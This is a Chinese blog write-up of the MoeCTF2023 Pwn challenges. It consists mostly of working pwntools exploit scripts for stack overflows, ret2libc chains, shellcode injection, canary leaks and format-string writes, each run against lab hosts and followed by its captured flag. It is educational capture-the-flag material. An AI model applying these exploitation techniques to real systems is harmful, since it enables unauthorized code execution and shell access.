MoeCTF2023_Pwn

最新推荐文章于 2023-12-19 21:22:56 发布
最新推荐文章于 2023-12-19 21:22:56 发布
阅读量292 收藏 2
点赞数
分类专栏: MoeCTF2023 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75094067/article/details/133808220
版权

文章目录

MoeCTF2023_Pwn

入门指北

moectf{M4ke_A_Promi5e_7hat_1_C4nn0t_Re9ret}

test_nc

ls -a:列出当前目录下的所有文件和目录,包括以点开头的隐藏文件和隐藏目录。

Oh, welcome here. Here is a shell for you.
ls -a
.
..
.bash_logout
.bashrc
.flag
.profile
bin
dev
gift
lib
lib32
lib64
libx32
test_nc
cat .flag
moectf{pgUR-Ujq7OM6DcmazH8iU4bu-FSChjU2}

baby_calculator

判断给出的加法等式是否正确,正确响应"BlackBird",否则响应"WingS"

from pwn import *

def find_flag(text):
    pattern = r'moectf\{(.+?)\}'
    matches = re.findall(pattern, text)
    flag="moectf{"+matches[0]+"}"
    return flag
def find_number(string,find):
    start_index = string.find(find) + len(find)  
    end_index = string.find("\n", start_index)  
    if start_index != -1 and end_index != -1:
        number = string[start_index:end_index] 
        number = number.strip()  
        if number.isdigit():
            number = int(number)  
            return number


conn = remote('192.168.31.104', 5563)
response = conn.recv().decode()

while response:
    print(response)
    string = response
    split_string = string.split("The first:")
    if len(split_string) > 1:
        n1 = find_number(string, "The first:")
    split_string = string.split("The second:")
    if len(split_string) > 1:
        n2 = find_number(string, "The second:")
    split_string = string.split("=")
    if len(split_string) > 1:
        result = find_number(string, str(n1) + "+" + str(n2) + "=")
        if n1 + n2 == result:
            request = ("BlackBird").encode()
            print("BlackBird")
            print("--------------------")
            conn.sendline(request)
        else:
            request = ("WingS").encode()
            print("WingS")
            print("--------------------")
            conn.sendline(request)
    if "moectf{" in string:
        print(find_flag(string))
        break
    response = conn.recv().decode()


conn.close()
# moectf{H4ve_y0u_rea11y_useD_Pwnt00ls??????}

fd

fd (File descriptor)文件描述符

0:标准输入( STDIN_FILENO )

1:标准输出( STDOUT_FILENO )

2:标准错误( STDERR_FILENO )

print((4 * 3) | 0x29A)    #670

爆破

from pwn import *

#670
for i in range(1,1000000):
    conn = remote('192.168.31.104', 3745)
    data="{}".format(i)
    print(data)
    if conn.sendlineafter("Please input its fd:",data.encode()):
        response = conn.recv()
        response = conn.recv()
        print(response)
    if response.find('moectf'.encode())!= -1:
        break

    conn.close()
# moectf{t1kfEs7B_EE9P0mm4rMKSs6gQV8gSx6T}

int_overflow

4294852782

ret2text_32

$ checksec ret2text_32
[*] 'ret2text'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

from pwn import *  
context(log_level='debug',arch='amd64',os='linux')
file='./ret2text_32'
#io= process(file)
elf=ELF(file)
io= remote('192.168.31.104',7193)
#gdb.attach(sh)
#pause()
system_addr=elf.symbols['system']
binsh_addr = 0x804C02C #"\bin\sh"
age='256'
padding=0x58+4 #0x58字节偏移到ebp,4字节填充ebp
payload=b'A' * padding + p32(system_addr)+p32(0)+p32(binsh_addr)
io.sendlineafter("What's your age?",age.encode())
io.sendlineafter("Now..try to overflow!",payload)
io.interactive()
#moectf{S5pYKZ53tB2CUcRa9D-xEp_2GxSMoJnh}

构造 system(“/bin/sh”);

在这里插入图片描述

ret2text_64

$ checksec ret2text_64
[*] 'ret2text_64'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
$ ROPgadget --binary ret2text_64 |grep "pop rdi ; ret"
0x00000000004011b9 : cli ; push rbp ; mov rbp, rsp ; pop rdi ; ret
0x00000000004011b6 : endbr64 ; push rbp ; mov rbp, rsp ; pop rdi ; ret
0x00000000004011bc : mov ebp, esp ; pop rdi ; ret
0x00000000004011bb : mov rbp, rsp ; pop rdi ; ret
0x00000000004011be : pop rdi ; ret
0x00000000004011ba : push rbp ; mov rbp, rsp ; pop rdi ; ret
$ ROPgadget --binary ret2text_64 |grep "ret"
0x000000000040101a : ret

from pwn import *  
context(log_level='debug',arch='amd64',os='linux')
file='./ret2text_64'
#io= process(file)
elf=ELF(file)
io= remote('192.168.31.104',2296)
#gdb.attach(sh)
#pause()
ret_addr=0x40101a
pop_rdi_ret_addr=0x4011BE
system_addr=elf.symbols['system']
binsh_addr = 0x404050 #"\bin\sh"
age='256'
padding=0x50+8 #0x50字节偏移到ebp,8字节填充ebp
payload=b'A' * padding+p64(ret_addr)+p64(pop_rdi_ret_addr)+p64(binsh_addr) + p64(system_addr)
io.sendlineafter("What's your age?",age.encode())
io.sendlineafter("Now..try to overflow!",payload)
io.interactive()
#moectf{O8eSWuNkJwpc0oq0shU0CPJXwrrh285b}

shellcode_level0

from pwn import *
context(os="linux",arch="amd64",log_level="debug")
io = remote("192.168.31.104",14966)
#io = process("./shellcode_level0")

shellcode = asm(shellcraft.sh())
io.sendline(shellcode)

io.interactive()
#moectf{dDxZNGOmYizVlroJZIvfclphrRmX6S4N}

shellcode_level1

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1', 41577)
#p = process('./shellcode_level1')
#爆破出4
p.sendlineafter("Which paper will you choose?","4")
payload = asm(shellcraft.sh())
p.sendline(payload)
p.interactive()
#moectf{z0tpiy7ZYh5LFD_sr_V1-B2_09ZoK-ER}

uninitialized_key

from pwn import *

context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1', 43307)
#p = process('./uninitialized_key')
#age、key存储在同一栈中
p.sendline("114514")
p.sendline("")
p.interactive()
#moectf{Ba1x1l6yO82CV7x3VyT2ZJSlUmEU8MpO}

format_level0

格式化字符串漏洞

from pwn import *

context(log_level='debug',arch='amd64',os='linux')
flag = ""
#爆破  7-16
for i in range(1,30):
    p = remote('127.0.0.1', 39731)
    # p = process('./format_level0')

    p.sendline(f"%{i}$p")
    try:
        p.recvuntil("0x")
    except Exception:
        p.close()

    
    try:
    	byte_str = binascii.unhexlify(p.recvline()[:-1])
    	str_result = byte_str.decode("utf-8")
    except Exception:
        print()
    else:
        flag += str_result[::-1]
        print(flag)
    finally:
        p.close()

#moectf{djyQ8wD93DlHPhbtrRz4z7EWWQYZLxty}

PIE_enabled

$ checksec PIE_enabled
[*] 'PIE_enabled'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

在ret2text_64基础上加了PIE保护(每次执行程序函数地址不同)

根据与vuln地址的相对关系进行payload

from pwn import *
elf=ELF('./PIE_enabled')
context(log_level='debug',arch='amd64',os='linux')

#计算相对偏移量
vuln_addr=elf.symbols['vuln']
system_addr=elf.symbols['system']
system_off=vuln_addr-system_addr
pop_rdi_ret=0x1323
pop_rdi_ret_off=vuln_addr-pop_rdi_ret
ret=0x101a
ret_off=vuln_addr-ret
sh=0x4010
sh_off=vuln_addr-sh


p=remote('192.168.31.104',12357)
p.recvuntil("Vuln's address is:0x")
p_vuln_addr=p.recv(12)
p_vuln_addr=int(p_vuln_addr,16)

p_system_addr=p_vuln_addr-system_off
p_pop_rdi_ret=p_vuln_addr-pop_rdi_ret_off
p_ret=p_vuln_addr-ret_off
p_sh=p_vuln_addr-sh_off

payload=b'b' * (0x50)+b'b'*8 +p64(p_ret)+p64(p_pop_rdi_ret)+p64(p_sh)+p64(p_system_addr)
p.sendline(payload)
p.interactive()
#moectf{TCFSENeNGg51Od-dK__pQb_J_NYa6RGr}

ret2libc

$ checksec ret2libc
[*] 'ret2libc'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

from pwn import *
from LibcSearcher import*

def get_address():
    return u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))

context(log_level='debug',arch='amd64',os='linux')
file='./ret2libc'
#io = process(file)
io = remote('192.168.31.104',1232)

elf = ELF(file)
pop_rdi = 0x40117e
main = elf.symbols['main']
ret = 0x40101a
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pl = b'a'*0x58 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)

io.sendline(pl)
puts_addr = get_address()

print(hex(puts_addr))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

pl2 = b'a'*0x58 + p64(ret)+ p64(pop_rdi) + p64(binsh) + p64(system) 

io.sendline(pl2)
io.interactive()
#moectf{l9O3YkzUrLasawfKEI9WuKPHYjOLcq4d}

ret2syscall

$ checksec ret2syscall
[*] 'ret2syscall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

使用ret2libc

from pwn import *
from LibcSearcher import*

def get_address():
    return u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))

context(log_level='debug',arch='amd64',os='linux')
file='./ret2syscall'
#io = process(file)
io = remote('192.168.31.104',8136)

elf = ELF(file)
pop_rdi = 0x401180
main = elf.symbols['main']
ret = 0x40101a
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pl = b'a'*0x48 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)

io.sendline(pl)
puts_addr = get_address()

print(hex(puts_addr))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

pl2 = b'a'*0x48 + p64(ret)+ p64(pop_rdi) + p64(binsh) + p64(system) 

io.sendline(pl2)
io.interactive()
#moectf{BYxNwSuXE0hSRmtrLl5rTy0jjW64fzCL}

shellcode_level2

from pwn import *

context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1',45227)
# p = process('./shellcode_level2')


#test al, al   al置0
payload = b'\x00'+asm(shellcraft.sh()) 

p.sendline(payload)
p.interactive()
#moectf{EkC3EwTnvIdBWnHP4LICEOf5iTH8WUhU}

uninitialized_key_plus

from pwn import *

context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1', 41433)
# p = process('./uninitialized_key_plus')

payload = b"a"*20 + p32(0x1BF52)
p.sendline(payload)
p.sendline(b"\x00")
p.interactive()
#moectf{DdXrphNTs0f_IZ_nmS6DYmq9YjHcmQMO}

format_level1

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1',40361)
# p = process('./format_level1')
#覆写HP
p.sendline("3")
payload = b"%8$n" + p64(0x804c00c)
p.sendline(payload)
p.sendlineafter("What would you like to do?","1")

p.interactive()
#moectf{9QuyCepMTaGDgGtTp8vp5YfTDFIai2CJ}

little_canary

from pwn import *
from LibcSearcher import *  

context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1', 44633)
# p = process('./little_canary')
elf = ELF("./little_canary")

main = 0x4012BA
pop_rdi = 0x0000000000401343

p.sendlineafter(b"name?\n",b"a"*72)
p.recvuntil(b"\n")
canary = u64(b"\x00"+p.recv(7))

success(hex(canary))
print(hex(elf.got['puts']))
payload = b'a'*72+p64(canary)+p64(0)
payload += p64(pop_rdi) + p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(main)
p.sendline(payload)

leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
libc = LibcSearcher('puts',leak)  
libc_base = leak - libc.dump('puts')
success(hex(libc_base))

p.sendline(b"payload")

payload = b'a'*72+p64(canary)+p64(0)
payload += p64(pop_rdi) + p64(libc_base + libc.dump("str_bin_sh"))+p64(0x4012DC)
payload += p64(libc_base + libc.dump('system'))
p.sendline(payload)

p.interactive()
#moectf{8TPv5mE3xyba2AoatuARfsUQ32z82sGp}

rePWNse

from pwn import *

context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1', 40435)
# p = process('./rePWNse')

pop_rdi = 0x000000000040168e

p.sendline("1")            #7
p.sendline("9")        #8
p.sendline("1")            #9
p.sendline("9")        #10
p.sendline("8")            #11
p.sendline("1")            #12
p.sendline("0")            #13

p.recvuntil("address is:")
leak = int(p.recvline()[2:-1],16)
payload = b'a'*0x48+p64(pop_rdi)+p64(leak)+p64(0x401296)
p.sendline(payload)

p.interactive()
#moectf{tH2eDw89_R4cGQn5JDSLFR1Q0WQHmyO5}

shellcode_level3

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1', 39211)
# p = process('./shellcode_level2')

p.sendline(b"\xE9\x48\xD1\xFF\xFF")
p.interactive()
#moectf{ujUzKQk4ag6e_JzhDYoagJKPdUKkA0_S}

format_level2

from pwn import *

context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1',40399)
# p = process('./format_level2')

p.sendlineafter(":",b"3")
p.sendlineafter(":",b"%p")

p.recvuntil("0x")
stack = int(p.recvline()[:-1], 16)
func_ret = stack + 64
p.sendline(b"3")
payload = b"%23p%10$hhn".ljust(12, b'a') + p32(func_ret)
p.send(payload)
p.sendlineafter(":",b"3")
payload = b"%147p%10$hhn".ljust(12, b'a') + p32(func_ret+1)
p.sendlineafter(":",payload)
p.sendlineafter(":",b"4")

p.interactive()
#moectf{u50L9U2XooeOIrEPvC1ooTGB1CIEvQ3c}

feedback

from pwn import *

context(log_level='debug',arch='amd64',os='linux')
p = remote('127.0.0.1', 44579)
# p = process('./feedback')

p.sendlineafter("Which list do you want to write?",b"-8")
payload = p64(0xFBAD1800) + p64(0)*3 + b'\x00'
p.sendlineafter(".\n",payload)

p.recvuntil(b'\x00'*8)
libc_base = u64(p.recv(8)) - 0x1ec980
success(hex(libc_base))
flag = libc_base + 0x1f1700

p.sendlineafter("?",b"-11")
p.sendlineafter(".",b'\x68')
p.sendlineafter("?",b"-11")
p.sendlineafter(".",p64(flag))

p.interactive()
#moectf{B3PhkYepZLTLiI0vcar7LP7nf3pyL-4A}

format_level3

from pwn import *

p = remote('127.0.0.1',46687)
# p = process('./format_level3')

p.sendlineafter(":",b"3")
p.sendlineafter(":",b"%6$p")
p.recvuntil("0x")
stack = int(p.recvline()[:-1], 16)
func_ret = stack + 4

p.sendlineafter(":",b"3")
payload = "%{}p%6$hhn".format(func_ret & 0xff)
p.sendlineafter(":",payload.encode())
p.sendlineafter(":",b"3")
payload = "%{}p%14$hn".format(0x9317)
p.sendlineafter(":",payload.encode())
p.sendlineafter(":",b"4")
p.interactive()
#moectf{vHc9T-kdIOLbjZG7MriTvEVjQYbl_Y97}
m0_75094067
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
[MoeCTF]2023
liaochonxiang的博客
10-16 218
junk_code RUST 根据提示下载完插件后,在IDAZ中运行以下代码生成插件 ezandroid 来到主函数,发现调用sub_270CDF函数 来到主要逻辑处sub_27BF90函数 跟进加密函数 EXP
MoeCTF 2023 Reverse题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-06 841
搜索main函数跟进双击跟进aMoectfF1rstSt3得到flag。
【西电Moectf2023-Jail-WP】
qq_33295410的博客
09-27 2656
它支持在源码行间设置(有条件的)断点和单步执行,检视堆栈帧,列出源码列表,以及在任何堆栈帧的上下文中运行任意 Python 代码。当各位玩家连接后 可以看到一个类似于菜单的东西.输入g(G)会获得挑战的源码,输入e(E)会进入挑战,输入c(C)会得到挑战的描述[题目里的会更加详细],输入q(Q)会退出。设置了两个功能,一个是漏洞利用,可以使用python下面函数查看环境变量,找到真正的key,再利用backdoor来getshell。手动在终端输入是不行的,需要使用脚本提交,贴上代码。
MoeCTF 2023 “天网“ 题解
最新发布
qq_34090939的博客
12-19 1241
十分的创新,对新生来说也是一道很有意义的题,在做这道题的过程中也可以学到非常多的编程概念,例如异常处理、面向对象、委托事件等等,同时还能感受到C#的魅力~ 看似毫无关联的东西,但最后串联起来的感觉十分过瘾~~个人愿意打满分的一道.NET逆向题~希望可可能再多来点这种题QwQ。
2023MoeCTF-WEB题解(持续更新)
m0_74317362的博客
10-18 953
先进行一次16进制解码再对后面的字符串进行一次base64解码,得到flag。
PWM.rar_PWN
09-23
在本例中,"PWM.rar_PWN" 指的可能是一个与电子工程或编程相关的项目,尤其是针对硬件控制的场景,如亮度调节和直流电机转速控制。 在电子领域,PWM 通过改变脉冲宽度来模拟不同的电压水平。具体来说,它发送一系列...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
pwm.zip_PIC_PWN
09-14
标题"PWM.zip_PIC_PWN"暗示了这是一个与微控制器Pic相关的项目,主要涉及的是脉宽调制(PWM)技术的汇编语言源代码。在嵌入式系统中,PIC微控制器是广泛应用的一种微处理器,尤其在控制和信号处理任务中。而PWM是一...
MoeCTF_2023新生赛 Reverse题解WP【详解】-(学习记录)‘‘
Sciurdae的博客
10-21 1288
MoeCTF是我学习Re以来接触的第一个比赛!举办的很nice!(づ ̄3 ̄)づ╭❤~明年看看有没有时间,akakak要ak一次才完整a!Github仓库题目下载还差几题,有空补上,还需努力。
moectf Restrictions限制
weixin_43939887的博客
09-13 178
搜索引擎是不能为所欲为的 题目即本站 根据题意flag在不被搜索引擎收录的内容,所以查看/robots.txt,载入https://moectf.cn/robots.txt后提示flag已给出 但是并没有看到flag,右键鼠标检索源代码 发现flag: moectf{j4vascrlpt_c4n_m0dlfy_w3bpages} ...
moeCTF题解-0x00】序
框架科工:Framecraft
10-09 787
moeCTF题解-0x00】序 本是空间院的摸鱼佬,毫无准备地转到了网安专业。虽然实验班的机试让我初窥了CTF的世界,但moeCTF才是真正的入门之旅,感谢大佬师傅们的教程式渐进题目,让我学到了好多好多。啊,现在我已经不是萌新惹。作为大二的老生参与moe,还是挺羞耻呢 (〃ノωノ) 感觉自己目前对Misc部分最擅长,这部分也最有趣啦,(可能因为以前也都是野路子叭,只自己捣鼓电脑,学得杂而不精),其他方向感觉仍在门外需慢慢学习…… 这些题解会同时发布于我的GitHub小窝 ...
NSSCTF-[NSSRound#X Basic]ez_z3 && [MoeCTF 2022]Art &&[HDCTF2023]basketball
weixin_61154173的博客
04-27 1336
RGB的初见,DFS代码求多解
moeCTF题解-0x06】Web
框架科工:Framecraft
11-06 2534
title: 【moeCTF题解-0x06】Web categories: CTF moeCTF tags: CTF Web Python 【moeCTF题解-0x06】Web 竟然AK了这部分,但也只是因为题目简单…… 考虑到在XDSEC里选了web方向,也要好好学习web知识呀 【moeCTF题解】总目录如下:(若本文图片看不见请访问以下相应的地址) 【moeCTF题解-0x00】序 (包括Sign in) 【moeCTF题解-0x01】Reverse (包括An.
Writeup-moectf-ezphp
DoubleLiii的博客
10-27 967
moectf web方向一个题
【2022Paradigm.ctf】random writeup
Rorschach:Blog
08-22 962
区块链智能合约相关题目
Jay17 2023.8.14日报 即 留校集训阶段性总结
Jay17的博客
08-15 2053
仅做日报使用,无意刷到请师傅们无视
部分ctf-web题解
weixin_66669317的博客
12-06 1480
ctfweb部分题解
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值